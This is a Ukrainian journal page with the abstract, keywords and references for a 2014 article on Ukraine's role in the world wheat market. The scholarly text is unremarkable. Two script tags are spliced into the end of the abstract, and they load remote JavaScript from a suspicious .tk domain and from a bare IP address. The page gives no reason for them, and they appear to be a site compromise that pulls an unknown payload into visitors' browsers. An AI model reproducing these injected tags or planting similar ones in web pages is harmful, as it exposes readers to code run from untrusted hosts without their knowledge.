ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 339.5:633.11(477)
Зовнішньоекономічні відносини

Україна в міжнародній торгівлі пшеницею / Салькова І. Ю. // Економіка АПК. - 2014. - № 1 - С. 75

Досліджено тенденції розвитку зернової галузі в Україні, що дають змогу зміцнювати позиції на світовому ринку зерна. Зосереджено увагу на тому, що наявний економічний та агропромисловий потенціал виробників пшениці дає змогу насичувати внутрішній ринок і брати активну участь у міжнародній торгівлі. Наведено основні показники діяльності світового ринку пшениці й визначено головні світові експортери та імпортери. Проаналізовано стан світового ринку пшениці й місце в ньому України. Досліджено фактори, що впливають на пропозицію пшениці на міжнародному ринку, розкрито шляхи раціоналізації виробництва та поліпшення взаємовідносин між виробниками і споживачами зернопродукції. Визначено проблеми реалізації українського зерна на зовнішні ринки, розглянуто перспективи інтеграції українських виробників зерна у світовий ринок. Особлива увага загострюється на проблемі стимулювання державних органів щодо експорту українського зерна на світовий ринок. Рис.: 2. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: зерно, експорт, імпорт, світовий ринок пшениці, виробництво, міжнародна торгівля

Список використаних джерел

 1. Голомша Н.Є. Конкурентоспроможність зернових на аграрному ринку / Н.Є. Голомша // Економіка АПК. – 2009. – №12. –С. 83-88.
 2. Губенко В.І. Конкурентоспроможність продукції АПК: стан та можливості в умовах глобалізації / В.І. Губенко // Вісн. Сумського нац. аграр. ун-ту. – Сер.: Економіка та менеджмент. –2010. – Вип. 5.2. – С. 3-7.
 3. Камінський І.В. Стан виробництва та кон’юнктура ринку зернових культур в Україні Електронний ресурс / І.В. Камінський. – Режим доступу : http://archive.nbuv.gov.ua/portal/chem_biol/agroin/2010_46/KAMINSKIY.pdf
 4. Кваша С.М. СОТ та пріоритети аграрної економічної науки / С.М. Кваша // Економіка АПК. – 2008. – № 5. – С. 8-12
 5. Кименко О.Г. Оцінки ефективності державного регулювання експорту та експортних цін на ринку зернових та олійних культур в Україні / О.Г. Кименко, О.В. Артюшин // Ринкова трансформація економіки: стан, проблеми, перспективи. – К.: ІАЕ УААН, 2009. – С. 23-30.
 6. Кузнецова І. Яка ж роль відведена Україні в світовому виробництві та експорті пшениці? / І. Кузнецова // Зерно і хліб. – 2008. – № 2. – С. 3-6
 7. Статистична інформація. Державна служба статистики України. [Електронний ресурс]. – Режим доступу: http://www.propozitsiya.com.
 8. Формування і розвиток ринку зерна в Україні / [Шпикуляк О. Г., Воскобійник Ю. П., Саблук Р. П., Овсянніков О. В.]. – К. : ННЦ ІАЕ, 2008. – 190 с.
 9. Dan O'Brien Wheat. Market Outlook in September 2013. [Electronik resourse]. – Mode of access: http://www.agmanager.info /marketing/outlook/newletters/Wheat.asp
 10. Prospects for Agricultural Markets and Income in the EU. [Electronik resourse]. – Mode of access : http://ec.europa.eu/agriculture/publi/caprep/prospects2010/fullrep_en.pdf
 11. Reports and statistical data [Electronik resourse]. – Mode of access: http://faostat.fao.org/desktopdefault.aspx?pageid=342&lang=en&country=230
 12. The US WTO Agricultural Proposal for Global Trade Reform [Electronik resourse]. – Mode of access: http://www.usda.gov/.
Читати статтю: 14_01_75-78.pdf